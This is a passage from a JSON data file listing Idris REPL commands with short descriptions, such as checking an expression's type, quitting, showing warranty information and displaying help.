\"Check the type of an expression.\"\n },\n {\n \"key\": \":q, :quit\",\n \"val\": \"Exit the Idris system\"\n },\n {\n \"key\": \":w, :warranty\",\n \"val\": \"Displays warranty information\"\n },\n {\n \"key\": \":?, :h, :help\",\n \"val\": \"Display this help text\"\n },\n {\n \"key\": \":pp, :pprint